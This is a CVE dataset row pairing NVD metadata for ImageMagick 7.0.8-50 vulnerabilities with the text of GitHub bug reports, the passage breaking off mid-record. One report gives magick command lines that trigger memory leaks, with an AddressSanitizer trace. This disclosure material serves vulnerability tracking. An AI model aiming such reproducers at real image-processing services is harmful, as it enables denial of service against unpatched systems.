- ImageMagick version:
Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-21 https://imagemagick.org
- Environment (Operating system, version and so on):
Description: Ubuntu 18.04.1 LTS
Release: 18.04
Codename: bionic
- Additional information:
CC=clang-7 CXX=clang++-7 ./configure --disable-openmp
<!-- Thanks for reporting the issue to ImageMagick! -->
| heap-buffer-overflow at MagickCore/threshold.c:323:33 in AdaptiveThresholdImage | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1608/comments | 2 | 2019-06-21T05:58:31Z | 2019-07-08T01:48:18Z | https://github.com/ImageMagick/ImageMagick/issues/1608 | 459,023,037 | 1,608 |
CVE-2019-13296 | 2019-07-05T01:15:09.983 | ImageMagick 7.0.8-50 Q16 has direct memory leaks in AcquireMagickMemory because of an error in CLIListOperatorImages in MagickWand/operation.c for a NULL value. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": [
"Patch"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/ce08a3691a8ac29125e29fc41967b3737fa3f425"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1604"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*",
"matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1604 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [x] I have written a descriptive issue title
- [x] I have verified that I am using the latest version of ImageMagick
- [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There're a direct memory leaks in AcquireMagickMemory of MagickCore/memory.c:478:10 and
many indirect memory leaks.
### Steps to Reproduce
<!-- List of steps, sample code, failing test or link to a project that reproduces the behavior.
Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues -->
run cmd:
`magick -seed 0 "(" magick:netscape +repage ")" "(" magick:granite +repage ")" -append -fft -compare tmp`
and this cmd also can trigger them.
cmd:
`magick -seed 0 -bias 0% "(" magick:rose +repage ")" "(" magick:rose -despeckle -threshold 26 -wave 55x83 ")" -sampling-factor 3.65x3.408 -channel RGBA -compare -mosaic -compare tmp`
Here's ASAN result.
```
==5674==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 13504 byte(s) in 1 object(s) allocated from:
#0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397)
#1 0x7fdfed7f4146 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7fdfed7a1154 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10
#3 0x7fdfed7a5709 in CloneImage MagickCore/image.c:823:25
#4 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16
#5 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22
#6 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14
#7 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#8 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#9 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#10 0x526f95 in MagickMain utilities/magick.c:149:10
#11 0x5268e1 in main utilities/magick.c:180:10
#12 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 940032 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200)
#1 0x7fdfed7f3f66 in AcquireAlignedMemory MagickCore/memory.c:265:7
#2 0x7fdfed53c6ac in OpenPixelCache MagickCore/cache.c:3728:46
#3 0x7fdfed542991 in GetImagePixelCache MagickCore/cache.c:1754:18
#4 0x7fdfed52a330 in QueueAuthenticPixelCacheNexus MagickCore/cache.c:4156:28
#5 0x7fdfed52a001 in GetAuthenticPixelCacheNexus MagickCore/cache.c:1324:10
#6 0x7fdfed54ca4e in GetCacheViewAuthenticPixels MagickCore/cache-view.c:312:10
#7 0x7fdfed7b43e1 in SetImageAlpha MagickCore/image.c:2372:7
#8 0x7fdfed8356d5 in ConformPixelInfo MagickCore/pixel.c:235:12
#9 0x7fdfed7a84e7 in SetImageBackgroundColor MagickCore/image.c:2441:3
#10 0x7fdfed7a4c47 in AppendImages MagickCore/image.c:533:10
#11 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22
#12 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14
#13 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#14 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#15 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#16 0x526f95 in MagickMain utilities/magick.c:149:10
#17 0x5268e1 in main utilities/magick.c:180:10
#18 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 22616 byte(s) in 1 object(s) allocated from:
#0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397)
#1 0x7fdfed7f4146 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7fdfed7f41af in AcquireQuantumMemory MagickCore/memory.c:551:10
#3 0x7fdfed7a6b3d in CloneImage MagickCore/image.c:879:43
#4 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16
#5 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22
#6 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14
#7 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#8 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#9 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#10 0x526f95 in MagickMain utilities/magick.c:149:10
#11 0x5268e1 in main utilities/magick.c:180:10
#12 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 13024 byte(s) in 1 object(s) allocated from:
#0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397)
#1 0x7fdfed7f4146 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7fdfed7a1154 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10
#3 0x7fdfed7a3793 in AcquireImageInfo MagickCore/image.c:350:28
#4 0x7fdfed7ac553 in CloneImageInfo MagickCore/image.c:945:14
#5 0x7fdfed7a36b8 in SyncImageSettings MagickCore/image.c:4242:21
#6 0x7fdfed7baea6 in SyncImagesSettings MagickCore/image.c:4000:12
#7 0x7fdfecf78153 in CLIOption MagickWand/operation.c:5243:14
#8 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#9 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#10 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#11 0x526f95 in MagickMain utilities/magick.c:149:10
#12 0x5268e1 in main utilities/magick.c:180:10
#13 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 9152 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200)
#1 0x7fdfed7f3f66 in AcquireAlignedMemory MagickCore/memory.c:265:7
#2 0x7fdfed526a04 in AcquirePixelCache MagickCore/cache.c:195:28
#3 0x7fdfed527f8d in ClonePixelCache MagickCore/cache.c:513:28
#4 0x7fdfed7a75df in CloneImage MagickCore/image.c:910:22
#5 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16
#6 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22
#7 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14
#8 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#9 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#10 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#11 0x526f95 in MagickMain utilities/magick.c:149:10
#12 0x5268e1 in main utilities/magick.c:180:10
#13 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 512 byte(s) in 1 object(s) allocated from:
#0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397)
#1 0x7fdfed7f4146 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7fdfed7f41af in AcquireQuantumMemory MagickCore/memory.c:551:10
#3 0x7fdfed834f7a in AcquirePixelChannelMap MagickCore/pixel.c:101:35
#4 0x7fdfed835154 in ClonePixelChannelMap MagickCore/pixel.c:139:13
#5 0x7fdfed7a638f in CloneImage MagickCore/image.c:849:28
#6 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16
#7 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22
#8 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14
#9 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#10 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#11 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#12 0x526f95 in MagickMain utilities/magick.c:149:10
#13 0x5268e1 in main utilities/magick.c:180:10
#14 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 288 byte(s) in 1 object(s) allocated from:
#0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397)
#1 0x7fdfed7f4146 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7fdfed504284 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10
#3 0x7fdfed505d5d in CloneBlobInfo MagickCore/blob.c:554:27
#4 0x7fdfed7a6848 in CloneImage MagickCore/image.c:867:25
#5 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16
#6 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22
#7 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14
#8 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#9 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#10 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#11 0x526f95 in MagickMain utilities/magick.c:149:10
#12 0x5268e1 in main utilities/magick.c:180:10
#13 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 192 byte(s) in 1 object(s) allocated from:
#0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397)
#1 0x7fdfed7f4146 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7fdfed7f41af in AcquireQuantumMemory MagickCore/memory.c:551:10
#3 0x7fdfed5275df in AcquirePixelCacheNexus MagickCore/cache.c:271:29
#4 0x7fdfed526f8d in AcquirePixelCache MagickCore/cache.c:212:26
#5 0x7fdfed527f8d in ClonePixelCache MagickCore/cache.c:513:28
#6 0x7fdfed7a75df in CloneImage MagickCore/image.c:910:22
#7 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16
#8 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22
#9 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14
#10 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 96 byte(s) in 3 object(s) allocated from:
#0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397)
#1 0x7fdfed7f4146 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7fdfed94f073 in AddValueToSplayTree MagickCore/splay-tree.c:189:21
#3 0x7fdfed94ff7c in CloneSplayTree MagickCore/splay-tree.c:372:12
#4 0x7fdfed884f23 in CloneImageProperties MagickCore/property.c:196:25
#5 0x7fdfed7a5f99 in CloneImage MagickCore/image.c:839:10
#6 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16
#7 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22
#8 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14
#9 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#10 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#11 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#12 0x526f95 in MagickMain utilities/magick.c:149:10
#13 0x5268e1 in main utilities/magick.c:180:10
#14 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 88 byte(s) in 1 object(s) allocated from:
#0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397)
#1 0x7fdfed7f4146 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7fdfed9540c4 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10
#3 0x7fdfed950155 in NewSplayTree MagickCore/splay-tree.c:1148:32
#4 0x7fdfed94fd64 in CloneSplayTree MagickCore/splay-tree.c:360:14
#5 0x7fdfed884f23 in CloneImageProperties MagickCore/property.c:196:25
#6 0x7fdfed7a5f99 in CloneImage MagickCore/image.c:839:10
#7 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16
#8 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22
#9 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14
#10 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 80 byte(s) in 3 object(s) allocated from:
#0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397)
#1 0x7fdfed7f4146 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7fdfed7f41af in AcquireQuantumMemory MagickCore/memory.c:551:10
#3 0x7fdfed987963 in ConstantString MagickCore/string.c:713:26
#4 0x7fdfed94ff66 in CloneSplayTree MagickCore/splay-tree.c:373:7
#5 0x7fdfed884f23 in CloneImageProperties MagickCore/property.c:196:25
#6 0x7fdfed7a5f99 in CloneImage MagickCore/image.c:839:10
#7 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16
#8 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22
#9 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14
#10 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200)
#1 0x7fdfed9397c1 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7
#2 0x7fdfed939003 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36
#3 0x7fdfed7a69df in CloneImage MagickCore/image.c:871:26
#4 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16
#5 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22
#6 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14
#7 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#8 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#9 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#10 0x526f95 in MagickMain utilities/magick.c:149:10
#11 0x5268e1 in main utilities/magick.c:180:10
#12 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200)
#1 0x7fdfed9397c1 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7
#2 0x7fdfed939003 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36
#3 0x7fdfed5061ae in GetBlobInfo MagickCore/blob.c:1745:24
#4 0x7fdfed505d6a in CloneBlobInfo MagickCore/blob.c:555:3
#5 0x7fdfed7a6848 in CloneImage MagickCore/image.c:867:25
#6 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16
#7 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22
#8 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14
#9 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#10 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#11 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#12 0x526f95 in MagickMain utilities/magick.c:149:10
#13 0x5268e1 in main utilities/magick.c:180:10
#14 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200)
#1 0x7fdfed9397c1 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7
#2 0x7fdfed939003 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36
#3 0x7fdfed527383 in AcquirePixelCache MagickCore/cache.c:231:30
#4 0x7fdfed527f8d in ClonePixelCache MagickCore/cache.c:513:28
#5 0x7fdfed7a75df in CloneImage MagickCore/image.c:910:22
#6 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16
#7 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22
#8 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14
#9 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#10 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#11 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#12 0x526f95 in MagickMain utilities/magick.c:149:10
#13 0x5268e1 in main utilities/magick.c:180:10
#14 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200)
#1 0x7fdfed9397c1 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7
#2 0x7fdfed939003 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36
#3 0x7fdfed5272f4 in AcquirePixelCache MagickCore/cache.c:229:25
#4 0x7fdfed527f8d in ClonePixelCache MagickCore/cache.c:513:28
#5 0x7fdfed7a75df in CloneImage MagickCore/image.c:910:22
#6 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16
#7 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22
#8 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14
#9 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#10 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#11 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#12 0x526f95 in MagickMain utilities/magick.c:149:10
#13 0x5268e1 in main utilities/magick.c:180:10
#14 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200)
#1 0x7fdfed7f3f66 in AcquireAlignedMemory MagickCore/memory.c:265:7
#2 0x7fdfed5274e2 in AcquirePixelCacheNexus MagickCore/cache.c:267:29
#3 0x7fdfed526f8d in AcquirePixelCache MagickCore/cache.c:212:26
#4 0x7fdfed527f8d in ClonePixelCache MagickCore/cache.c:513:28
#5 0x7fdfed7a75df in CloneImage MagickCore/image.c:910:22
#6 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16
#7 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22
#8 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14
#9 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#10 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#11 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#12 0x526f95 in MagickMain utilities/magick.c:149:10
#13 0x5268e1 in main utilities/magick.c:180:10
#14 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200)
#1 0x7fdfed9397c1 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7
#2 0x7fdfed939003 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36
#3 0x7fdfed9503c9 in NewSplayTree MagickCore/splay-tree.c:1159:25
#4 0x7fdfed94fd64 in CloneSplayTree MagickCore/splay-tree.c:360:14
#5 0x7fdfed884f23 in CloneImageProperties MagickCore/property.c:196:25
#6 0x7fdfed7a5f99 in CloneImage MagickCore/image.c:839:10
#7 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16
#8 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22
#9 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14
#10 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 32 byte(s) in 3 object(s) allocated from:
#0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397)
#1 0x7fdfed7f4146 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7fdfed7f41af in AcquireQuantumMemory MagickCore/memory.c:551:10
#3 0x7fdfed987963 in ConstantString MagickCore/string.c:713:26
#4 0x7fdfed94fee1 in CloneSplayTree MagickCore/splay-tree.c:372:43
#5 0x7fdfed884f23 in CloneImageProperties MagickCore/property.c:196:25
#6 0x7fdfed7a5f99 in CloneImage MagickCore/image.c:839:10
#7 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16
#8 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22
#9 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14
#10 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
SUMMARY: AddressSanitizer: 1000000 byte(s) leaked in 24 allocation(s).
```
### System Configuration
<!-- Tell us about the environment where you are experiencing the bug -->
- ImageMagick version:
Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-18 https://imagemagick.org
- Environment (Operating system, version and so on):
Description: Ubuntu 18.04.1 LTS
Release: 18.04
Codename: bionic
- Additional information:
CC=clang-7 CXX=clang++-7 ./configure --disable-openmp
<!-- Thanks for reporting the issue to ImageMagick! -->
| Direct memory leaks in AcquireMagickMemory and indirect memory leaks | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1604/comments | 2 | 2019-06-18T17:22:26Z | 2019-07-08T01:48:39Z | https://github.com/ImageMagick/ImageMagick/issues/1604 | 457,603,906 | 1,604 |
CVE-2019-13297 | 2019-07-05T01:15:10.047 | ImageMagick 7.0.8-50 Q16 has a heap-based buffer over-read at MagickCore/threshold.c in AdaptiveThresholdImage because a height of zero is mishandled. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/604588fc35c7585abb7a9e71f69bb82e4389fefc"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1609"
},
{
"source": "[email protected]",
"tags": [
